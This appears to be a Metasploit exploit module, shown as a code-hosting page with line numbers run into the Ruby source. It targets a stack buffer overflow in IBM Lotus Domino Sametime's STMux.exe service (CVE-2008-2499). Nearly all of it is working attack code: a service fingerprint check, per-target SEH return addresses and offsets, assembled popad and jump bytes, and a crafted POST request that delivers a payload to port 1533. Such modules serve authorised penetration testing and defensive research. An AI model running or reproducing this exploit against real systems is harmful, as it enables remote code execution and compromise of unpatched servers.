Path: blob/master/modules/exploits/windows/lotus/domino_sametime_stmux.rb
19813 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow',15'Description' => %q{16This module exploits a stack buffer overflow in Lotus Domino\'s Sametime17Server. By sending an overly long POST request to the Multiplexer18STMux.exe service we are able to overwrite SEH. Based on the exploit19by Manuel Santamarina Suarez.20},21'Author' => [ 'aushack', 'riaf <riaf[at]mysec.org>' ],22'Arch' => [ ARCH_X86 ],23'License' => MSF_LICENSE,24'References' => [25[ 'CVE', '2008-2499' ],26[ 'OSVDB', '45610' ],27[ 'BID', '29328' ],28[ 'ZDI', '08-028' ],29[ 'ATT&CK', Mitre::Attack::Technique::T1210_EXPLOITATION_OF_REMOTE_SERVICES]30],31'Privileged' => true,32'DefaultOptions' => {33'EXITFUNC' => 'seh',34},35'Payload' => {36'Space' => 1024,37'BadChars' => "\x00\x0a\x0d",38'StackAdjustment' => -3500,39},40'Platform' => ['win'],41'Targets' => [42# Patrick - Tested OK against Windows 2003 SP1 2008111443[ 'Lotus Sametime 7.5 on Windows Server 2000 SP4', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 268 ] }], # pop ecx, pop exc, ret msvcr71.dll44[ 'Lotus Sametime 7.5 on Windows Server 2003 SP1', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 269 ] }], # pop ecx, pop exc, ret msvcr71.dll45[ 'Lotus Sametime 7.5 on Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],46[ 'Lotus Sametime 7.5.1 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 5, 269 ] }],47[ 'Lotus Sametime 8.0.0 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],48],49'DisclosureDate' => '2008-05-21',50'DefaultTarget' => 1,51'Notes' => {52'Reliability' => UNKNOWN_RELIABILITY,53'Stability' => UNKNOWN_STABILITY,54'SideEffects' => UNKNOWN_SIDE_EFFECTS55}56)57)5859register_options(60[61Opt::RPORT(1533),62]63)64end6566def check67connect6869req = "HEAD / HTTP/1.1\r\n"70req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"71req << "User-Agent: Sametime Community Agent\r\n\r\n"7273sock.put(req)74res = sock.get_once || ''7576disconnect7778if (res.to_s =~ /Lotus-Domino/)79connect8081req = "GET /CommunityCBR HTTP/1.1\r\n"82req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"83req << "User-Agent: Sametime Community Agent\r\n\r\n"84sock.put(req)85res = sock.get_once || ''8687disconnect8889if (res.to_s =~ /200 OK/)90return Exploit::CheckCode::Detected91end92end9394return Exploit::CheckCode::Safe95end9697def exploit98connect99100pad1 = rand_text_alpha_lower(44)101pad2 = rand_text_alpha_lower(29)102103# Patrick - We should use Metasm here.104popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * target['Offset'][0]105popad = Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset'][1]106esp = "\xff\x24\x24" # dword ptr ss:[esp]107jmp = "\x74\x23" + "\x75\x21" # je short, jnz short108seh = [target['Ret']].pack('V')109110path = pad1 + jmp + seh + pad2 + popebx + popad + esp111112req = "POST /CommunityCBR/CC.39.#{path}/\r\n"113req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"114req << "User-Agent: Sametime Community Agent\r\n"115req << "Content-Length: #{payload.encoded.length}\r\n"116req << "Connection: Close\r\n"117req << "Cache-Control: no-cache\r\n\r\n"118req << payload.encoded119120sock.put(req)121122handler123disconnect124end125end126127128